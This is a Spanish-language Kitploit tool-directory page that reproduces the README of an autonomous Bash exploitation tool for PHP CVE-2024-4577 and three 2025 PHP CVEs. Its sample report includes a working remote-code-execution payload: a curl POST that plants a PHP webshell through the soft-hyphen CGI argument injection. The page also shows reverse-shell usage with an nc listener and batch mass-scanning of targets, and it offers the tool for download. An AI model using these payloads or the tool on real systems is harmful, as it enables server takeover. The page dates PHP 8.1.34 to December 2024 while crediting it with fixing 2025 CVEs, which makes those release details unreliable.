Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PHP_8.1.x_Exploit — Detección y explotación automatizadas de vulnerabilidades críticas de PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) | Kitploit
Herramientas/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
ReconocimientoEscáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónComando y ControlCrawlerHerramienta de Acceso Remoto
GitHubgl1tch0x1/php_8.1.x_exploit
13hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

PHP_8.1.x_Exploit

Detección y explotación automatizadas de vulnerabilidades críticas de PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

Ver Repositorio
Compartir

🚀 PHP CVE Autopilot

Detección y explotación automatizada de vulnerabilidades críticas de PHP (bypass CVE-2024-4577, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

License: GPL v3 Bash

PHP8.1.x_Exploit.sh es una herramienta de evaluación de seguridad de un solo archivo, sin configuración que descubre automáticamente endpoints PHP vulnerables y explota cuatro CVEs de alto impacto que afectan a versiones de PHP anteriores a 8.1.34 (publicada en diciembre de 2024). No requiere ningún crafting manual de payloads – solo proporciona una URL y el script hace el resto, desde el rastreo hasta la ejecución remota de código. Completamente autopiloto – detecta y explota automáticamente sin intervención del usuario.

Características

  • Autopiloto completamente autónomo – dada una sola URL, rastrea, toma huellas, prueba y explota sin interacción del usuario.
  • Escaneo por lotes – introduce una lista de objetivos y ejecuta en paralelo.
  • Rastreo avanzado – extrae enlaces y formularios de la página de inicio para una mejor detección.
  • Huella digital del SO y versión de PHP – evita ataques solo para Windows en Linux, verifica la versión de PHP.
  • Bypass CVE-2024-4577 (Inyección de argumentos CGI en Windows)
    • Detecta y explota endpoints PHP-CGI vulnerables.
    • Reverse shell opcional (PowerShell one‑liner).
    • Dos variantes de inyección: estándar -d y bypass con guion suave %AD.
  • CVE-2025-14177 – fuga de memoria heap mediante getimagesize()
    • Crea dinámicamente un JPEG malformado y lo envía automáticamente a cualquier endpoint de subida descubierto.
    • Detecta memoria filtrada en las respuestas.
  • Escaneo local profundo mediante RCE (cuando se explota CVE-2024-4577)
    • Sube un escáner PHP ligero que prueba:
      • CVE-2025-14180 – desreferencia de puntero NULL en PDO PostgreSQL.
      • CVE-2025-14178 – desbordamiento de entero en array_merge.
  • Rastreo inteligente – extrae enlaces y formularios para descubrir scripts CGI y páginas de subida.
  • Ejecución en paralelo – usa parallel si está disponible, sino funciona correctamente.
  • Modos verbose y debug – ve cada petición HTTP y cada decisión.
  • Generación de informes – guarda todos los hallazgos en un archivo de texto.
  • Limpio y seguro – los archivos temporales se destruyen al salir, los timeouts evitan bloqueos.
  • Requisitos

    DependenciaPropósito¿Normalmente instalado?
    bash 4.0+Intérprete de scriptsSí (Linux/macOS)
    curlPeticiones HTTPSí
    grep, sed, awkProcesamiento de textoSí
    mktempCreación de archivos temporalesSí
    (opcional) parallelEscaneo por lotes más rápidoNo (pero recomendado)
    (opcional) jqFormateo de salida JSONNo

    No se requieren privilegios de root – la herramienta solo envía peticiones HTTP y opcionalmente ejecuta un reverse shell (requiere un listener en tu máquina).

    Instalación

    root@kitploit:~
    git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
    cd PHP_8.1.x_Exploit
    chmod +x PHP8.1.x_Exploit.sh
    

    Uso

    Objetivo único (más común)

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://target.example.com
    

    Objetivo único con reverse shell (CVE-2024-4577)

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444
    

    Luego en tu máquina:

    root@kitploit:~
    nc -lvnp 4444
    

    Escaneo por lotes de múltiples objetivos

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -l targets.txt --threads 10
    

    Ejemplo targets.txt:

    root@kitploit:~
    http://192.168.1.1/
    https://10.0.0.5:8080/
    http://internal-app.company.com
    

    Modo solo escaneo (sin intentos de explotación)

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only
    

    Guardar informe en archivo

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt
    

    Salida verbose / debug

    root@kitploit:~
    ./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
    ./PHP8.1.x_Exploit.sh -u http://target.com/ --debug   # muy ruidoso
    

    Cómo funciona (fases)

    FaseAcción
    1Huella digital – SO y versión de PHP a partir de cabeceras y sondeos.
    2Rastreo – extrae atributos href y action de la página de inicio.
    3Descubrimiento de CGI – prueba rutas comunes y enlaces rastreados que parecen CGI.
    4Prueba de CVE‑2024‑4577 – inyecta payloads -d y %AD; si tiene éxito, ejecuta comandos o envía reverse shell.
    5Descubrimiento de endpoints de subida – verifica rutas de subida comunes y formularios que contengan "upload"/"image".
    6Prueba de CVE‑2025‑14177 – crea un JPEG malformado, lo envía por POST a cada endpoint de subida, detecta fugas de heap.
    7Escaneo interno profundo – si se logra RCE, sube un script PHP escáner y lo ejecuta para probar CVE‑2025‑14180 / CVE‑2025‑14178.
    8Informe – imprime un resumen y opcionalmente escribe en un archivo.

    Opciones de línea de comandos (referencia completa)

    OpciónDescripción
    -u URLURL de un solo objetivo (ej. http://example.com/)
    -l FILEArchivo por lotes con una URL por línea
    --scan-onlySolo detectar – no explotar (sin reverse shell, sin subidas de payload)
    -o FILEEscribir informe final en FILE
    --threads NNúmero de hilos paralelos para escaneo por lotes (predeterminado: 5)
    --timeout NTiempo de espera HTTP en segundos (predeterminado: 10)
    --no-colorDeshabilitar salida coloreada
    --verboseMostrar progreso detallado
    --debugMostrar cada petición HTTP (puede exponer datos sensibles)
    --revshell IP PORTIntentar reverse shell cuando se encuentre CVE‑2024‑4577
    -h, --helpMostrar ayuda y salir

    CVEs cubiertos en detalle

    CVEGravedadImpactoVector de explotaciónCorregido en
    CVE‑2024‑4577 (bypass)CríticoRCEInyección de argumentos CGI en Windows (mapeo de guion suave)PHP 8.1.34
    CVE‑2025‑14177Media/AltaFuga de información (memoria heap)JPEG malformado pasado a getimagesize()PHP 8.1.34
    CVE‑2025‑14180AltaDoS (desreferencia NULL)PDO PostgreSQL con prepares emulados + parámetro malformado \x99PHP 8.1.34
    CVE‑2025‑14178Alta (8.2)DoS / posible corrupción de memoriaarray_merge() con arrays enormes causando desbordamiento de enteroPHP 8.1.34

    Nota: CVE‑2025‑14180 y CVE‑2025‑14178 solo pueden detectarse con precisión desde dentro del servidor (pruebas locales). El script logra esto subiendo un escáner después de un exploit CGI exitoso.

    📸 Ejemplo de salida

    root@kitploit:~
    [*] Scanning: http://192.168.1.100/
    [*] OS: windows
    [*] PHP version: 8.1.33
    [*] Testing CVE-2024-4577 on http://192.168.1.100/cgi-bin/php-cgi.exe
    [✓] CVE-2024-4577: VULNERABLE (soft hyphen injection)
    [*] Attempting reverse shell to 192.168.1.5 4444
    ...
    [*] Testing CVE-2025-14177 via http://192.168.1.100/upload.php
    [-] CVE-2025-14177: Potential heap leak detected!
    ...
    [*] Running deep local scan via RCE...
    PHP_VERSION=8.1.33
    CVE-2025-14180: VULNERABLE
    CVE-2025-14178: VULNERABLE
    CVE-2025-14177: VULNERABLE (leak: 486561704c65616b21...)
    
    ===================== Report for http://192.168.1.100/ =====================
    OS: windows
    PHP: 8.1.33
    CVE-2024-4577: EXPLOITABLE at http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input
    PoC: curl -X POST --data '<?php system($_GET["c"]); ?>' 'http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input&c=whoami'
    CVE-2025-14177: VULNERABLE
    CVE-2025-14180/14178: VULNERABLE (see deep scan output)
    ==============================================================
    

    ⚠️ Advertencias importantes y descargo de responsabilidad

    • Modo autopiloto – La herramienta explota vulnerabilidades automáticamente sin avisos. Úsela solo en objetivos autorizados.
    • Solo para uso legal – Esta herramienta está diseñada para evaluaciones de seguridad autorizadas, pruebas de penetración y fines educativos. Usarla contra sistemas sin permiso es ilegal en la mayoría de las jurisdicciones.
    • Sin garantía – El software se proporciona "TAL CUAL" sin garantías de ningún tipo.
    • Posibilidad de daños – Los exploits pueden bloquear servicios (CVE-2025-14180) o corromper memoria (CVE-2025-14178). No ejecutar en sistemas de producción sin consentimiento explícito.
    • Reverse shell – La opción --revshell abre un socket desde el objetivo hacia tu máquina. Asegúrate de tener el derecho de conexión de retorno.
    • Registro – Tus peticiones aparecerán en los logs de acceso/error del objetivo. Úsalo responsablemente.

    🛠️ Solución de problemas

    ProblemaSolución
    curl: command not foundInstala curl
    GNU parallel not foundIgnorado – el script funciona sin él (escaneos por lotes más lentos)
    No se encuentran endpoints CGIEl objetivo puede no usar CGI, o está detrás de un WAF que bloquea las banderas -d
    CVE-2024-4577 funciona pero el reverse shell fallaVerifica el firewall; prueba con un payload más simple usando --scan-only y un listener manual nc
    La prueba de fuga de imagen siempre devuelve "No leak"El endpoint de subida puede no usar getimagesize(), o limpia datos binarios
    La subida del escáner local fallaPuede que la raíz web no tenga permisos de escritura; el script intenta escribir en el mismo directorio que el script CGI

    🤝 Contribuciones

    Las solicitudes de incorporación de cambios, informes de errores y sugerencias de funciones son bienvenidas. Por favor, sigue:

    • Mantén el script de un solo archivo y en Bash puro.
    • Prueba con parallel y sin él.
    • Actualiza este README en consecuencia.

    📜 Licencia

    GNU General Public License v3.0 – consulta el archivo LICENSE.

    📚 Referencias

    • Anuncio de la versión PHP 8.1.34
    • Detalle de CVE-2024-4577 (NVD)
    • CVE-2025-14177 / 14178 / 14180 (NVD)
    • Mapeo de caracteres Best-Fit de Windows

    Hecho con 🧠 para la comunidad de seguridad. Úsalo éticamente.

    Descargar herramienta